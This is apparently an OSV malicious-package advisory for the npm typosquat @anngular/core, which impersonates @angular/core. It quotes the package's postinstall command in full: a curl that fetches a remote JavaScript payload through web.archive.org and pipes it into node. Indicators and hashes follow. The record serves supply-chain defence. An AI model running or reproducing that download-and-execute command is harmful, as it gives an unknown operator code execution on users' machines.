MAL-2026-17540

See a problem?
Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/@anngular/core/MAL-2026-17540.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-17540
Published
2026-10-05T03:32:14Z
Modified
2026-10-05T04:15:04Z
Summary
Malicious code in @anngular/core (npm)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (93d2078e85dc301d6b0299c93ff5e0e5e2c717290e88f18de85fce6554f2d027)

Package name @anngular/core (double-n) impersonates @angular/core, copying its description 'Angular - the core framework' and author 'angular'. package.json declares a postinstall lifecycle script: curl -L https://web.archive.org/web/https://gitflic.ru/project/hellscripter/install-scripts/blob/raw?file=node.js | node. On npm install, this unconditionally fetches an unpinned JavaScript payload from a non-publisher gitflic.ru repository (proxied through web.archive.org to evade host-based filtering) and pipes it directly into node, giving the operator of that gitflic.ru project arbitrary code execution on the installer's machine. The payload is not shipped with the package, is not integrity-pinned, and can be mutated at any time by whoever controls the gitflic.ru project.

Database specific
{
    "malicious-packages-origins": [
        {
            "id": "IN-MAL-2026-020993",
            "import_time": "2026-10-05T03:57:37.277322549Z",
            "modified_time": "2026-10-05T03:32:14Z",
            "sha256": "93d2078e85dc301d6b0299c93ff5e0e5e2c717290e88f18de85fce6554f2d027",
            "source": "amazon-inspector",
            "versions": [
                "22.2.1"
            ]
        }
    ]
}
References
Credits

Affected packages

npm / @anngular/core

Package

Name
@anngular/core
View open source insights on deps.dev
Purl
pkg:npm/%40anngular/core

Affected ranges

Affected versions

22.*
22.2.1

Database specific

cwes
[
    {
        "cweId": "CWE-506",
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code"
    }
]
indicators
{
    "evidence_files": [
        {
            "path": "package.json",
            "sha256": "72d94115b368cf5d89f4ccff42cdc4242c179ad180ba91974166399c747f5b21",
            "tlsh": "b9513724e4f48d6323df6254dd2a4943b138495b5c38bd68b3dd009c8f0e61f21beb9a"
        }
    ],
    "package_integrity": [
        {
            "filename": "core-22.2.1.tgz",
            "hashes": {
                "sha1": "c19de0bbea0e677e03b2dc5950fa968bf3391a10",
                "sha512_sri": "sha512-J4xcySzh+4IQ9lydzRFAAeWuAUxhA+GbjHqFXLJAjrWN0n8mVHNpW5ZdPLC5zgro6OKMPTWJvR2WwZjieOOE1g=="
            }
        }
    ]
}
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/@anngular/core/MAL-2026-17540.json"